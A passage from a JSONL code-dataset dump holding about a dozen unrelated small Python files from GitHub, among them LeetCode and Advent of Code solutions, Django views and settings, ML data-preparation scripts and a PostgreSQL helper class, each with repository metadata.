series_size","repo_name":"txqzzz/neu_curriculum","sub_path":"operating-system/lab4/page_replacement_algorithm/fifo.py","file_name":"fifo.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70758340356","text":"class Solution:\n def eraseOverlapIntervals(self, intervals: List[List[int]]) -> int:\n intervals.sort()\n prev = intervals[0]\n cnt = 0\n for ii in intervals[1:]:\n if prev[1] <= ii[0]:\n prev = ii\n elif prev[0] <= ii[0] and prev[1] >= ii[1]:\n prev = ii\n cnt += 1\n elif prev[0] <= ii[0] and prev[1] <= ii[1]:\n cnt += 1\n return cnt","repo_name":"aso2001/LeetCode","sub_path":"0435-non-overlapping-intervals/0435-non-overlapping-intervals.py","file_name":"0435-non-overlapping-intervals.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23396056010","text":"organizacion = \"con You Tube\"\n#las tres son equivalentes\n# print(\"se puede aprender a programar usando \" + organizacion)\n# print(\"se puede aprender a programar usando {}\".format(organizacion))\n# print( f\"se puede aprender a programar usando {organizacion}\")\n\n#se puede usar imput para solicitar al usuario que ingrese informaciom\nadj = input(\"adjetivo: \")\nverbo1= input(\"verbo: \")\nverbo2= input(\"verbo 2: \")\nsustantivoP = input(\"sustantivo (plural): \")\n\n#usando alt + z una linea larga se divide en varias para que quede bonito\n\nlistaloca = f\"¡programar es tan {adj}! siempre me emocina porque me encanta {verbo1} problemas. ¡aprende a {verbo2} con You Tube y alcanza tus {sustantivoP}\"\n\nprint(listaloca)","repo_name":"44685740-1/Recursos-y-Proyectos-Python","sub_path":"Proyectos Phython yt 1/historias.locas.py","file_name":"historias.locas.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27497434383","text":"\nfrom django.utils import timezone\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\n\nfrom services.views import TemplateViewSet, TemplateAPIView\nfrom services.pagination import CustomPageNumberPagination\nfrom department.models import Department\nfrom department.permissions import IsBelongToDepartment\nfrom .models import Goal, GoalLastEdit\nfrom .serializers import GoalDetailSerializer, GoalSerializer, EmptySerializer, GoalReviewSerializer\nfrom .serializers import GoalUpdateSerializer, GoalPercentageSerializer, ReviewSerializer\nfrom .permissions import CanCreateGoal, CanViewGoal, CanViewAllGoals, IsGoalAndUserDepartmentSame\nfrom .permissions import CanChangeGoal, CanDeleteGoal, CanChangeGoalStatus, CanAddReview\n\nclass GoalViewSet(TemplateViewSet, CustomPageNumberPagination):\n model = Goal\n\n def create(self, request):\n user = request.user\n serializer = self.get_serializer_class()(data=request.data)\n if serializer.is_valid():\n serializer.create(created_by=user)\n return Response(data=serializer.data, status=status.HTTP_201_CREATED)\n return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n def list(self, request):\n goals = Goal.objects.filter_from_query_params(request)\n page = self.paginate_queryset(queryset=goals, request=request)\n serializer = self.get_serializer_class()(instance=page, many=True)\n return self.get_paginated_response(data=serializer.data)\n\n def retrieve(self, request, pk):\n goal = self.get_object(pk=pk)\n serializer = self.get_serializer_class()(instance=goal)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def update(self, request, pk):\n goal = self.get_object(pk=pk)\n serializer = self.get_serializer_class()(instance=goal, data=request.data)\n if serializer.is_valid():\n serializer.update()\n GoalLastEdit.objects.update_or_create(\n goal=goal,\n defaults={\n \"edited_by\": request.user,\n \"edited_at\": timezone.now()\n }\n )\n return Response(serializer.data, status=status.HTTP_202_ACCEPTED)\n return Response({\"field_errors\": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk):\n goal = self.get_object(pk=pk)\n goal.delete()\n return Response(data={\"detail\": [_(\"Goal Delete Successful\")]}, status=status.HTTP_202_ACCEPTED)\n\n @action(methods=[\"patch\"], detail=True, url_path='accept-goal')\n def accept_goal(self, request, pk):\n goal = self.get_object(pk=pk)\n goal.accept_goal()\n return Response(data={\"detail\": [_(\"Goal accepted\")]}, status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True, url_path='reject-goal')\n def reject_goal(self, request, pk):\n goal = self.get_object(pk=pk)\n goal.reject_goal()\n return Response(data={\"detail\": [_(\"Goal pending status set\")]}, status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True, url_path='update-achivement-percentage')\n def update_achivement_percentage(self, request, pk):\n goal = self.get_object(pk=pk)\n serializer = self.get_serializer_class()(data=request.data)\n if serializer.is_valid():\n serializer.update_percentage(instance=goal)\n return Response(data={\"detail\": [_(\"Goal completion percentage update successful\")]}, status=status.HTTP_202_ACCEPTED)\n return Response(data={\"field_errors\": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permissions = []\n if self.action == 'create':\n permissions += [CanCreateGoal]\n elif self.action == 'list':\n permissions += [CanViewAllGoals]\n elif self.action == 'retrieve':\n permissions += [CanViewAllGoals|(IsGoalAndUserDepartmentSame&CanViewGoal)]\n elif self.action == 'destroy':\n permissions += [CanDeleteGoal, IsGoalAndUserDepartmentSame]\n elif self.action in ['accept_goal', 'reject_goal']:\n permissions += [CanChangeGoalStatus, CanViewAllGoals]\n elif self.action in ['update_achivement_percentage', 'update']:\n permissions += [CanChangeGoal, IsGoalAndUserDepartmentSame]\n return [permission() for permission in permissions]\n\n def get_serializer_class(self):\n if self.action in ['reject_goal', 'accept_goal']:\n return EmptySerializer\n elif self.action == 'update_achivement_percentage':\n return GoalPercentageSerializer\n elif self.action == 'update':\n return GoalUpdateSerializer\n elif self.action == 'add_review_on_goal':\n return GoalReviewSerializer\n elif self.action == 'retrieve':\n return GoalDetailSerializer\n return GoalSerializer\n\n\nclass DepartmentGoals(TemplateAPIView, CustomPageNumberPagination):\n model = Department\n serializer_class = GoalSerializer\n permission_classes = [CanViewAllGoals|(IsBelongToDepartment&CanViewGoal)]\n\n def get(self, request, department_pk):\n department = self.get_object(pk=department_pk)\n department_goals = Goal.objects.get_departmnet_goals(department=department)\n filtered_department_goals = department_goals.filter_from_query_params(request)\n page = self.paginate_queryset(queryset=filtered_department_goals, request=request)\n serializer = self.serializer_class(instance=page, many=True)\n return self.get_paginated_response(data=serializer.data)\n\n\nclass AddReviewView(TemplateAPIView):\n model = Goal\n serializer_class = ReviewSerializer\n permission_classes = [CanAddReview|(IsGoalAndUserDepartmentSame&CanViewGoal)]\n\n def post(self, request, goal_pk):\n goal = self.get_object(pk=goal_pk)\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n review = serializer.create(reviewed_by=request.user, goal=goal)\n response_serializer = self.serializer_class(instance=review)\n return Response(data=response_serializer.data, status=status.HTTP_201_CREATED)\n return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n","repo_name":"pi3o1416/task-management","sub_path":"goal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20701224709","text":"#!/usr/bin/env python\n\n# This script takes the raw data and creates a dictionary in the stimuli\n# directory, both as json and pkl.\nimport os,json,pickle\n\nwith open('stimopts.json','r') as f:\n jdat = json.load(f)\n\n# Tab delimited\nPHON_MAP = {}\nwith open(jdat['phon_map']) as f:\n for line in f:\n tmp = line.strip().split()\n PHON_MAP[tmp[0]] = [int(x) for x in tmp[1:]]\n\nSTIM = {}\nwith open(jdat['stim_master'], 'r') as f:\n with open(jdat['sem_map']) as fsem:\n for line in f:\n linesem = fsem.readline()\n sem = [int(x) for x in linesem.strip().split('\\t')]\n data = line.strip().split()\n\n phon_code = data[2]\n phon = []\n for p in phon_code:\n phon.append(PHON_MAP[p])\n\n STIM[data[0]] = {\n 'orth_code': data[1],\n 'phon_code': data[2],\n 'freq': int(data[3]),\n 'phon': phon,\n 'sem': sem\n }\n\nHOMO = {}\nfor word,d in STIM.items():\n try:\n HOMO[d['phon_code']].append(word)\n except KeyError:\n HOMO[d['phon_code']] = [word]\n\nfor word,homo in HOMO.items():\n if len(homo) == 1:\n del HOMO[word]\n\npath = os.path.join('stimuli','SAE')\n\nppath = os.path.join(path,'pkl','words_master.pkl')\nwith open(ppath,'wb') as f:\n pickle.dump(STIM,f)\n\njpath = os.path.join(path,'json','words_master.json')\nwith open(jpath,'wb') as f:\n json.dump(STIM,f,indent=2, separators=(',', ': '))\n\nppath = os.path.join(path,'pkl','homo_master.pkl')\nwith open(ppath,'wb') as f:\n pickle.dump(HOMO,f)\n\njpath = os.path.join(path,'json','homo_master.json')\nwith open(jpath,'wb') as f:\n json.dump(HOMO,f,indent=2, separators=(',', ': '))\n","repo_name":"crcox/aae_modeling_scripts","sub_path":"py/GenerateSAE_master.py","file_name":"GenerateSAE_master.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7661901758","text":"import os\nfrom tempfile import mktemp\nimport django\n\nGEO_CACHE = '~build/cache'\n\nDEBUG = True\nSTATIC_URL = '/static/'\n\nSITE_ID = 1\nROOT_URLCONF = 'tests.urls'\nSECRET_KEY = 'abc'\n# STATIC_ROOT = mktemp('static')\n# MEDIA_ROOT = mktemp('media')\n\ngettext = lambda s: s\nLANGUAGES = (\n ('de', gettext('German')),\n ('en', gettext('English')),\n)\n\nSOUTH_MIGRATION_MODULES = {\n 'geo': 'geo.south_migrations',\n}\nINSTALLED_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'south',\n 'geo']\n\nif django.VERSION[:2] >= (1,7):\n INSTALLED_APPS.remove('south')\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nTEMPLATE_DIRS = ['tests/templates']\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'full': {\n 'format': '%(levelname)-8s: %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'verbose': {\n 'format': '%(levelname)-8s: %(asctime)s %(name)-25s %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)-8s %(asctime)s %(name)-25s %(funcName)s %(message)s'\n },\n 'debug': {\n 'format': '%(levelno)s:%(levelname)-8s %(name)s %(funcName)s:%(lineno)s:: %(message)s'\n }\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'null': {\n 'level': 'DEBUG',\n 'class': 'django.utils.log.NullHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'debug'\n }\n },\n 'loggers': {\n 'concurrency': {\n 'handlers': ['null'],\n 'propagate': False,\n 'level': 'DEBUG'\n }\n }\n}\n\nDBNAME = os.environ.get('DBNAME', 'geo')\ndb = os.environ.get('DBENGINE', 'postgres')\nif db == 'postgres':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': DBNAME,\n 'HOST': '127.0.0.1',\n 'PORT': '',\n 'USER': 'postgres',\n 'PASSWORD': ''}}\nelif db == 'mysql':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': DBNAME,\n 'HOST': '127.0.0.1',\n 'PORT': '',\n 'USER': 'root',\n 'PASSWORD': '',\n 'CHARSET': 'utf8',\n 'COLLATION': 'utf8_general_ci',\n 'TEST_CHARSET': 'utf8',\n 'TEST_COLLATION': 'utf8_general_ci'}}\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': '%s.sqlite' % DBNAME,\n 'HOST': '',\n 'PORT': ''}}\n","repo_name":"saxix/django-geo","sub_path":"tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"61"} +{"seq_id":"71669853954","text":"# Just for playing around with the callback function, please remove\nimport random\n\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\n\nfrom src.graphs.graph_classes import Graphs\nfrom src.maindash import app\n\nmy_graphs = Graphs()\n\n\nclass LayoutOne:\n def make_layout(self):\n layout = html.Div(\n [\n html.Div(\n [\n dcc.Graph(id=\"regression_plot\"),\n html.P(\n \"Standard Deviation\",\n style={\"color\": \"white\", \"marginLeft\": \"20px\"},\n ),\n dcc.Slider(\n id=\"std_slider\",\n min=1979,\n max=2022,\n step=1,\n value=1979,\n marks={i: str(i) for i in range(1979, 2022, 2)},\n ),\n ]\n ),\n ]\n )\n return layout\n\n\n@app.callback(\n Output(component_id=\"regression_plot\", component_property=\"figure\"),\n [Input(component_id=\"std_slider\", component_property=\"value\")],\n)\ndef update_regression_plot(std):\n number = random.randint(0, 1)\n\n if number == 1:\n return my_graphs.iris(std)\n else:\n return my_graphs.windrose(std)\n","repo_name":"finneratzki1337/docker_python_dash_app","sub_path":"src/layouts/layout_classes.py","file_name":"layout_classes.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15085260594","text":"import tensorflow as tf\nimport cv2\nimport os\nimport numpy as np\nimport random\nimport sys\n\nfrom Constants import DATASET_SAVE_DIR\n\n\ndef createFeature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef createTFRecord(lines,startIndex,rowCount,rel_path,is_cls=True):\n records = []\n print(\"--------------------------------------------------------------->><<>\")\n for j in range(startIndex, rowCount):\n line = lines[j]\n lineArr = line.split()\n imagePath = lineArr[0]\n image = cv2.imread(rel_path + imagePath + \".jpg\")\n image = image.astype(np.float32)\n image = (image - 127.5) * (1. / 128.0)\n image = image.tostring()\n\n boundingBox = None\n lineArr[1] = int(lineArr[1])\n if is_cls:\n if lineArr[1] == 1 :\n originalLabel = np.array([0, 1], dtype=np.float32)\n boundingBox = lineArr[2:]\n\n boundingBox = np.array([boundingBox[0], boundingBox[1], boundingBox[2], boundingBox[3]])\n boundingBox = boundingBox.astype(np.float32)\n boundingBox = boundingBox.tostring()\n\n elif lineArr[1] == 0:\n originalLabel = np.array([1, 0], dtype=np.float32)\n boundingBox = np.array([0, 0, 0, 0], dtype=np.float32)\n boundingBox = boundingBox.tostring()\n\n else:\n originalLabel = np.array([0, 0], dtype=np.float32)\n boundingBox = lineArr[2:]\n boundingBox = np.array([boundingBox[0], boundingBox[1], boundingBox[2], boundingBox[3]])\n boundingBox = boundingBox.astype(np.float32)\n boundingBox = boundingBox.tostring()\n\n originalLabel = originalLabel.tostring()\n\n image = tf.train.BytesList(value=[image])\n label = tf.train.BytesList(value=[originalLabel])\n boundingBox = tf.train.BytesList(value=[boundingBox])\n\n imageFeature = tf.train.Feature(bytes_list=image)\n labelFeature = tf.train.Feature(bytes_list=label)\n bbFeature = tf.train.Feature(bytes_list=boundingBox)\n\n featuresDict = {\"image\": imageFeature, \"label\": labelFeature, \"boundingBox\": bbFeature}\n features = tf.train.Features(feature=featuresDict)\n example = tf.train.Example(features=features)\n records.append(example)\n return records\n\nif len(sys.argv) < 2:\n print(\"Insufficient arguments. Follow 'python3 data_gen/CreateTFRecordTraining.py '\")\n exit(0)\n\npart = sys.argv[1]\nrel_path = DATASET_SAVE_DIR+part\nrel_path_without_native = \"\"\n\nos.system(\"mkdir -p {0}\".format(part))\ndef generate_data_for_cls():\n files = [os.path.join(rel_path,\"pos_{0}.txt\".format(part)),\n os.path.join(rel_path,\"neg_{0}.txt\".format(part))]\n\n record_paths = []\n for file in files:\n with open(file,\"r\") as file:\n record_paths = record_paths+file.readlines()\n\n random.shuffle(record_paths)\n random.shuffle(record_paths)\n total_records = len(record_paths)\n\n per_file_record_count = 200000\n rec_index =0\n index = 0\n while rec_index < total_records:\n if rec_index+per_file_record_count > total_records:\n end_index = rec_index+per_file_record_count-total_records\n end_index = rec_index+per_file_record_count-end_index\n else:\n end_index = rec_index+per_file_record_count\n\n tf_records = createTFRecord(record_paths,rec_index,end_index,rel_path_without_native)\n tf_record_path = \"{0}/dataset_cls_{1}_{2}.tf\".format(part,part,index)\n tfWriter = tf.io.TFRecordWriter(tf_record_path)\n for record in tf_records:\n tfWriter.write(record.SerializeToString())\n tfWriter.close()\n\n print(\"start index {0},end index {1},size {2}\".format(rec_index,end_index,(end_index-rec_index)))\n rec_index = end_index\n index += 1\n\n\ndef generate_data_for_bb():\n files = [os.path.join(rel_path, \"pos_{0}.txt\".format(part)),\n os.path.join(rel_path, \"part_{0}.txt\".format(part))]\n\n record_paths = []\n for file in files:\n with open(file, \"r\") as file:\n record_paths = record_paths + file.readlines()\n\n random.shuffle(record_paths)\n random.shuffle(record_paths)\n total_records = len(record_paths)\n\n per_file_record_count = 200000\n rec_index = 0\n index = 0\n while rec_index < total_records:\n if rec_index + per_file_record_count > total_records:\n end_index = rec_index + per_file_record_count - total_records\n end_index = rec_index + per_file_record_count - end_index\n else:\n end_index = rec_index + per_file_record_count\n\n tf_records = createTFRecord(record_paths, rec_index, end_index, rel_path_without_native,is_cls=False)\n tf_record_path = \"{0}/dataset_bb_{1}_{2}.tf\".format(part,part,index)\n tfWriter = tf.io.TFRecordWriter(tf_record_path)\n for record in tf_records:\n tfWriter.write(record.SerializeToString())\n tfWriter.close()\n\n print(\"start index {0},end index {1},size {2}\".format(rec_index, end_index, (end_index - rec_index)))\n rec_index = end_index\n index += 1\n\ngenerate_data_for_cls()","repo_name":"gurushantj/MTCNN","sub_path":"data_gen/CreateTFRecordTraining.py","file_name":"CreateTFRecordTraining.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29230278583","text":"from josephus_solver import JosephusSolver\n\n\ndef main():\n solver = JosephusSolver()\n for i in range(int(input())):\n solver.n = int(input())\n solver.m = int(input())\n print(f\"Usando n={solver.n}, m={solver.m}, resultado={solver.solve()}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"oluiscabral/estrutura-de-dados","sub_path":"trab02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31121889344","text":"import concurrent.futures\nimport multiprocessing\nimport time\n\nstart = time.perf_counter()\n\ndef do_something(seconds):\n print(f\"Sleeping in {seconds} Seconds...\")\n time.sleep(seconds)\n return \"Done Sleeping...\"\n\n\nif __name__ == '__main__':\n\n # Encapsulates the execution of the function and allows us to check on it after it's been scheduled.\n with concurrent.futures.ProcessPoolExecutor() as executor:\n f1 = executor.submit(do_something, 1)\n print(f1.result())\n\n finish = time.perf_counter()\n print(f'Finished in {round(finish-start,2 )} second(s)')\n\n\n'''\n 1 Second\nProcess2 ^ |\n | |\n func() |\n 1 Second\nProcess1 ^ |\n | |\n func() |\n v\n Done\n\n------------------------- TIME ----------------------->\n\n'''","repo_name":"Vegadhardik7/Python-DSA-MySQL-Dynamic-Programming-Advance-Concepts","sub_path":"Python Multi-Processing/003 Parallel running and modification.py","file_name":"003 Parallel running and modification.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34917533203","text":"#!/usr/bin/python3\n#alphabet\na=[\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\n \"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n#setup variables\nv,e,n,c=[],\"\",[],0\n#create the rotation alphabets for each letter\nfor i in a:\n #the begining part\n for ii in a[c:]:\n #add to n\n n+=ii\n #the remaining part\n for ii in a[:c]:\n #add to n\n n+=ii\n #increment c by 1\n c+=1\n #add n to v\n v+=[n]\n #clear n\n n=[]\n#the message to encode/decode\nd=input(\"message: \")\n#go through each rotation\nfor h in range(0,len(v)):\n #go through each letter of the message\n for w in d:\n if w.isalpha():\n #the character substitute\n e+=str(v[h][a.index(w)])\n else:\n e+=w\n #display the variation of message\n print(e + \" : \" + str(h) + \"|\" + str((h-26)*-1))\n #clear e\n e=\"\"\n","repo_name":"adrianjtempelhoff/python_practice","sub_path":"python_practice/vig_cypher/vig_cypher.py","file_name":"vig_cypher.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1176424733","text":"#\n# @lc app=leetcode.cn id=105 lang=python3\n#\n# [105] 从前序与中序遍历序列构造二叉树\n#\n# https://leetcode-cn.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/description/\n#\n# algorithms\n# Medium (63.88%)\n# Likes: 327\n# Dislikes: 0\n# Total Accepted: 40.8K\n# Total Submissions: 63.9K\n# Testcase Example: '[3,9,20,15,7]\\n[9,3,15,20,7]'\n#\n# 根据一棵树的前序遍历与中序遍历构造二叉树。\n#\n# 注意:\n# 你可以假设树中没有重复的元素。\n#\n# 例如,给出\n#\n# 前序遍历 preorder = [3,9,20,15,7]\n# 中序遍历 inorder = [9,3,15,20,7]\n#\n# 返回如下的二叉树:\n#\n# ⁠ 3\n# ⁠ / \\\n# ⁠ 9 20\n# ⁠ / \\\n# ⁠ 15 7\n#\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def buildTree(self, preorder, inorder) -> TreeNode:\n return self.buildTree0(preorder, 0, len(preorder), inorder, 0, len(inorder))\n\n def buildTree0(self, preorder, i, j, inorder, p, q):\n \"\"\"根据preorder和inorder构造原来的树.\"\"\"\n if i == j:\n return None\n node = TreeNode(preorder[i])\n m = inorder.index(preorder[i])\n node.left = self.buildTree0(preorder, i+1, i+1+m-p, inorder, p, m)\n node.right = self.buildTree0(preorder, i+1+m-p, j, inorder, m+1, q)\n return node\n\n\n# @lc code=end\n","repo_name":"labusi/oj-problems","sub_path":"leetcode/python/105.从前序与中序遍历序列构造二叉树.py","file_name":"105.从前序与中序遍历序列构造二叉树.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42038581775","text":"import numpy as np \nfrom python_csdl_backend import Simulator\nfrom lsdo_rotor import RotorAnalysis, BEM, BEMParameters, AcStates, get_atmosphere, print_output\nfrom modopt.scipy_library import SLSQP\nfrom modopt.csdl_library import CSDLProblem\n\n\nrotor_analysis = RotorAnalysis()\n\nu = rotor_analysis.create_input('u', val=0, shape=(1, ))\nv = rotor_analysis.create_input('v', val=0, shape=(1, ))\nw = rotor_analysis.create_input('w', val=0, shape=(1, ))\naltitude = rotor_analysis.create_input('altitude', val=0, shape=(1, )) # in meter\n\nac_states = AcStates(u=u, v=v, w=w)\natmos = get_atmosphere(altitude=altitude)\n\nnum_nodes = 1\nnum_radial = 25\nnum_tangential = num_azimuthal = 1\nnum_blades = 2\n\nft2m = 0.3048\nm2in = 39.3701\n\ntwist_cp_guess = np.array([0.55207943, 0.35981639, 0.16753661, 0.12377559, 0.17724111, 0.07146789]) # rad\nchord_cp_guess = np.array([0.07295861, 0.10717677, 0.09075833, 0.06437597, 0.03848824, 0.02721645]) # m\n\nchord_cp = rotor_analysis.create_input('chord_cp', val=chord_cp_guess, dv_flag=True, lower=0.01, upper=0.4)\ntwist_cp = rotor_analysis.create_input('twist_cp', val=twist_cp_guess, dv_flag=True, lower=np.deg2rad(0), upper=np.deg2rad(85))\nthrust_vector = rotor_analysis.create_input('thrust_vector', val=np.array([0, 0, -1]).reshape(num_nodes, 3))\nthrust_origin = rotor_analysis.create_input('thrust_origin', val=np.array([-1.146, 1.619, -0.162]).reshape(num_nodes, 3)) # in m\npropeller_radius = rotor_analysis.create_input('propeller_radius', val=6/2*ft2m)\nrpm = rotor_analysis.create_input('rpm', val=2800, dv_flag=False, lower=800, upper=2000, scaler=1e-3)\n\nbem_parameters = BEMParameters(\n num_radial=num_radial,\n num_tangential=num_tangential,\n num_blades=num_blades,\n airfoil='NACA_4412',\n use_custom_airfoil_ml=True,\n normalized_hub_radius=0.2,\n num_cp=6, \n)\n\nbem_model = BEM(\n name='bem_analysis',\n BEM_parameters=bem_parameters,\n num_nodes=1,\n)\nbem_outputs = bem_model.evaluate(ac_states=ac_states, rpm=rpm, rotor_radius=propeller_radius, thrust_vector=thrust_vector, thrust_origin=thrust_origin,\n atmosphere=atmos, blade_chord_cp=chord_cp, blade_twist_cp=twist_cp)\n\nrotor_analysis.register_output(bem_outputs)\n\n\ncsdl_model = rotor_analysis.assemble_csdl()\ncsdl_model.add_constraint('bem_analysis.T', equals=2000, scaler=1e-3)\ncsdl_model.add_constraint('bem_analysis.Q', upper=160, scaler=1e-2)\nFOM = csdl_model.declare_variable('bem_analysis.FOM', shape=(num_nodes, ))\ncsdl_model.register_output('FOM_obj', FOM * -1)\ncsdl_model.add_objective('FOM_obj')\n\nsim = Simulator(csdl_model, analytics=True)\nprob = CSDLProblem(problem_name='pav_lift_rotor_opt', simulator=sim)\noptimizer = SLSQP(\n prob, \n maxiter=150, \n ftol=1e-4,\n)\noptimizer.solve()\noptimizer.print_results()\n\nprint_output(sim, rotor_analysis)\n","repo_name":"LSDOlab/lsdo_rotor","sub_path":"lsdo_rotor/vnv_scripts/aurora_pav/pav_lift_rotor.py","file_name":"pav_lift_rotor.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29576002770","text":"with open('05_input.txt', 'r') as file:\n seats_original = file.readlines()\n\n\nheighst_seat_id = 0\n\nfor seat in seats_original:\n seat = seat.replace('\\n', '')\n row = [0,127]\n for i in seat[0:7]:\n h = round((row[1] - row[0])/2 + 0.49)\n if i == 'F':\n row[1] -= h\n else:\n row[0] += h\n column = [0,7]\n for i in seat[7:]:\n h = round((column[1] - column[0])/2 + 0.49)\n if i == 'L':\n column[1] -= h\n else:\n column[0] += h\n seat_id = row[0] * 8 + column[0]\n if seat_id > heighst_seat_id:\n heighst_seat_id = seat_id\n\nprint(heighst_seat_id)","repo_name":"SH1RL0CK/advent_of_code","sub_path":"2020/05_puzzle1.py","file_name":"05_puzzle1.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35039137347","text":"import psycopg2\n\"\"\"\n Class to access Data Base PostGres\n\"\"\"\n\n\nclass DbClass:\n \"\"\"\n Class to be use to access the PostGres DataBase\n Methods :\n - connect()\n - execute(command)\n - commit()\n - close () - connection and cursor\n \"\"\"\n\n def __init__(self,\n hst='localhost',\n dbn='courses',\n usr='postgres',\n psw='postgres',\n prt='5432',\n conn=None,\n cur=None,\n log=False):\n \"\"\"\n Args:\n :param hst (str): PostGres host\n :param dbn (str): PostGres data base name - default = courses\n :param usr (str): PostGres user name\n :param psw (str): PostGres password\n :param prt (str): PostGres port - 5432\n :param conn (str): PostGres connection information\n :param cur (str): PostGres cursor for commands\n :param log (boolean): Print information - default = False\n \"\"\"\n self.hst = hst\n self.dbn = dbn\n self.usr = usr\n self.psw = psw\n self.prt = prt\n self.conn = conn\n self.cur = cur\n self.log = log\n\n def connect(self):\n \"\"\" Connect to database - PostGresSQL \"\"\"\n self.conn = psycopg2.connect(\n host=self.hst,\n database=self.dbn,\n user=self.usr,\n password=self.psw,\n port=self.prt\n )\n self.cur = self.conn.cursor()\n if self.log:\n print(\"Connecting to the PostgreSQL database...> '{db}' was succesfull.\\n\"\n .format(db=self.dbn))\n\n def execute(self, sql):\n \"\"\" Execute Command database - SQL \"\"\"\n if self.log:\n print(\"Command --> '{cmd}' \\n\".format(cmd=sql))\n self.cur.execute(sql)\n\n def commit(self):\n \"\"\" Execute Commit \"\"\"\n # commit the changes\n self.conn.commit()\n if self.log:\n print(\"Commit was succesful.\\n\")\n\n def close(self):\n \"\"\" Close connection and cursor of the PostgreSQL database server \"\"\"\n # close the communication with the PostgreSQL\n self.cur.close()\n self.conn.close()\n if self.log:\n print(\"\\nClose conn and cur of the PostgreSQL database...> '{db}' was succesfull.\"\n .format(db=self.dbn))\n\n#","repo_name":"marcobakos/courses","sub_path":"dbclass.py","file_name":"dbclass.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25432770619","text":"import tensorflow as tf\nimport numpy as np\nimport random, pickle, os\nfrom pathlib import Path\nfrom tqdm import trange\nfrom simulator_cfg import get_cfg\nfrom utils.vizdoom_api import VizDoom\nfrom utils.writer import Writer\n\n\n# Remove logs\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\ntf.logging.set_verbosity(tf.logging.ERROR)\n\ntf.enable_eager_execution()\ncfg = get_cfg()\n\nclass Simulator(object):\n\n def __init__(self):\n super(Simulator, self).__init__()\n \n self.model = cfg.model(cfg)\n self.optim = cfg.optim(cfg.learning_rate)\n self.loss = cfg.loss\n self.epoch = tf.Variable(0)\n\n self.writer = 